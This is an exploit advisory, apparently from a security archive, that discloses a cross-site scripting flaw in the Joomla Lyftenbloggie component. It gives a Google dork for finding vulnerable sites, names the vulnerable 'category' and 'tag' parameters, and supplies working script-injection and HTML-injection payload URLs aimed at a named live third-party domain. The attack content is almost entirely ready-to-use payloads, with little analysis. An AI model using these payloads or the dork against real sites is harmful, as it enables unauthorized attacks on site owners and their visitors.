Joomla Lyftenbloggie Cross Site Scripting

Joomla Lyftenbloggie Cross Site Scripting: Posted Dec 16, 2010; Authored by Ashiyane Digital Security Team; The Joomla Lyftenbloggie component suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 74aacac0efc848b19ed3319b23dc16ab918331d64b7c64adf86d704ba0106a2b; Download | Favorite | View

Joomla Lyftenbloggie Cross Site Scripting


####################################################################
# Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability       #
####################################################################
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 ______           __                                             
/\  _  \         /\ \      __                                    
\ \ \L\ \    ____\ \ \___ /\_\  __  __     __      ___      __   
 \ \  __ \  /',__\\ \  _ `\/\ \/\ \/\ \  /'__`\  /' _ `\  /'__`\ 
  \ \ \/\ \/\__, `\\ \ \ \ \ \ \ \ \_\ \/\ \L\.\_/\ \/\ \/\  __/ 
   \ \_\ \_\/\____/ \ \_\ \_\ \_\/`____ \ \__/.\_\ \_\ \_\ \____\
    \/_/\/_/\/___/   \/_/\/_/\/_/`/___/> \/__/\/_/\/_/\/_/\/____/
                                    /\___/                       
                                    \/__/                        
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
####################################################################
# Name: Joomla Component (com_lyftenbloggie) XSS/HTML Vulnerability

# Vendor: http://www.lyften.com/products/lyften-bloggie.html

# Date: 2010-12-16

# Author: Ashiyane Digital Security Team

# Contact: XroGuE ~> Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com

# Home: www.Ashiyane.org/forums/ 

# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !

####################################################################
 
[+] Dork: inurl:"index.php?option=com_lyftenbloggie"
 
####################################################################
 
[+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&category=[XSS/HTML]
[+] vuln: http://127.0.0.1/index.php?option=com_lyftenbloggie&tag=[XSS/HTML]


[+] XSS: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<script>var XroG= String.fromCharCode(88, 114, 111, 71, 117, 69);alert(XroG)</script>
 

[+] HTML: http://www.nastel.com/index.php?option=com_lyftenbloggie&tag=<marquee><font color=Blue size=15>XroGuE</font></marquee>

####################################################################

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 58 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Joomla Lyftenbloggie Cross Site Scripting

Joomla Lyftenbloggie Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Lyftenbloggie Cross Site Scripting

Share This

Joomla Lyftenbloggie Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems